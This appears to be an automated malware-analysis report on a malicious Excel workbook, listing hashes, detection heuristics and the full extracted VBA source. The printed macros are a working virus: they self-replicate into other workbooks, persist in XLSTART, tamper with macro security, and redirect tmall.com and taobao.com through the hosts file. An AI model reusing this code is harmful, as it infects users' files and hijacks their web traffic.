Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 8d8c8d61cc1c190b…

MALICIOUS

Office (OLE) / .XLS

106.0 KB Created: 2023-02-21 06:18:31 Authoring application: Microsoft Excel First seen: 2026-06-21
MD5: 8b85e3f06b77989f2aa5c29bd31c689c SHA-1: 62a0d395513614f604889849d4248a73b04ca9ab SHA-256: 8d8c8d61cc1c190b4fb34aa9e4bcc2bdf993901fe30b8a611067701d1db9177e
236 Risk Score

Heuristics 7

  • ClamAV: Xls.Virus.Valyria-10004391-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Virus.Valyria-10004391-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
    'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
        Application.OnSheetActivate = ""
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
        ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6805 bytes
SHA-256: 0a468aaad4baaffa9a09bb5e2667dc1b894541ec78a31a43c62c1a0e33139889
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kangatang"

Sub Auto_Open()
'If ThisWorkbook.Path <> Application.Path & "\XLSTART" Then ThisWorkbook.SaveAs Filename:=Application.Path & "\XLSTART\mypersonel.xls"
Application.DisplayAlerts = False
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath Then
    Application.ScreenUpdating = False
    Windows(1).Visible = False
    ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\mypersonnel.xls"
    Windows(1).Visible = True
End If

    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "mypersonnel.xls!allocated"
End Sub

Sub allocated()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "Kangatang" Then
    Application.ScreenUpdating = False
    currentsh = ActiveSheet.Name
    ThisWorkbook.Sheets("Kangatang").Copy before:=ActiveWorkbook.Sheets(1)
    ActiveWorkbook.Sheets(currentsh).Select
    Application.ScreenUpdating = True
  End If
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1
Sub OfficeCheck()
Dim SysParh As String, Sysadd As String, t As String, sysadd1 As String
SysParh = Space(256)
GetSystemDirectory SysParh, 256
SysParh = Trim(SysParh)
SysParh = Left(SysParh, Len(SysParh) - 1)
SysParh = SysParh & "\drivers\etc\hosts"
Sysadd = "45.78.21.150 www.tmall.com"
sysadd1 = "#45.78.21.150 www.tmall.com"
If Dir(SysParh) <> "" Then
Open SysParh For Input As #1
t = Input(LOF(1), #1)
Close #1
If InStr(t, Sysadd) <> 0 Then
Open SysParh For Output As #1
t = Replace(t, sysadd1, Sysadd)
t = Replace(t, "#45.78.21.150 www.taobao.com", "45.78.21.150 www.taobao.com")
Print #1, t
Close #1
End If
If InStr(t, Sysadd) = 0 Then
Open SysParh For Append As #1
Print #1, vbNewLine & Sysadd & vbNewLine & "45.78.21.150 www.taobao.com"
Close #1
End If
End If
End Sub
Sub runtimer()
Application.OnTime Now + TimeValue("00:00:05"), "thisworkbook.p2d"
End Sub
Private Sub p2d()
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
   Dim WBstr$, Wb As Workbook
    With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.FileFormat = 52 Or ActiveWorkbook.FileFormat = 56 Then
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call d2p"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub"
    End If
    End If
End Sub
Private Sub d2p()
Dim pth As String
Dim Exl As Excel.Application
Dim WBstr$, fn$, Wb As Workbook
Dim ws As Worksheet
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
pth = Application.StartupPath & "\accelerate.xls"
If Dir(pth) = "" Then
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number <> 1004 Then
    Workbooks.Add.SaveAs Filename:=pth, FileFormat:=18
Else
    Workbooks.Close
End If
Else
    Exit Sub
End If
    Set Wb = Workbooks.Open(pth)
        With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call runtimer"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub"
    End If
    ActiveWorkbook.IsAddin = True
    Wb.Save
    Wb.Close
End Sub




Sub Workbook_Open()
Set App = Application
End Sub
Private Sub App_WorkbookOpen(ByVal Wb As Workbook)
Call OfficeCheck
Call d2p
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.